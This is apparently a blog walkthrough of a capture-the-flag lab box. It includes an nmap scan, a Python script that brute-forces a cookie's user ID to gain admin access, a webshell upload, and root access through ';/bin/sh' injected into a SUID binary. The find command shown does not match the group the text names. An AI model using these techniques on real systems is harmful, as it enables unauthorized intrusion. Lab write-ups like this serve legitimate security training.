$ sudo nmap -PS -sS 10.10.10.28 -sC
Nmap scan report for 10.10.10.28
Host is up (0.68s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http
|_http-title: Welcome
There was not a login page, or no feature.
There was another directory with view-source.
I could found 2 important information.
1. /cdn-cgi/login/login.php
2. /uploads/
I should keep the 2nd directory information, it will be useful information later.
I could see a login page.
The account was admin and password was "MEGACORP_4dm1n!!". The password was from the previous box.
I could see some menus and my cookie. The cookie was "user=34322; role=admin".
The uploads menu showed an error message "This action require super admin rights".
So, I should gain the super admin right. I changed the user number of the cookie.
import requests
from bs4 import BeautifulSoup
def exp():
host, port = "http://10.10.10.28", 80
for i in range(86574, 100000):
cookies = {
"user":str(i),
"role":"admin"
}
r = requests.get(host+"/cdn-cgi/login/admin.php?content=uploads", cookies=cookies)
if "Authenticating" not in r.text:
print(f"Found: {str(i)}")
exit()
if __name__ == "__main__":
exp()
I found the user number to access the uploads menu.
I generated a webshell using weevely.
There was a user account and password.
I could access the box with SSH with the robert's credentials. I got the user flag.
Next, I should gain a root permission. I looked forward other vulnerabilities.
After few mintues, I checked a suspicous group name "bugtracker".
I found the suspicous binary /usr/bin/bugtracker.
- find / -type f -group kali 2>/dev/null
It runs with root permission.
I got the root permission after I put ";/bin/sh".
END
No comments:
Post a Comment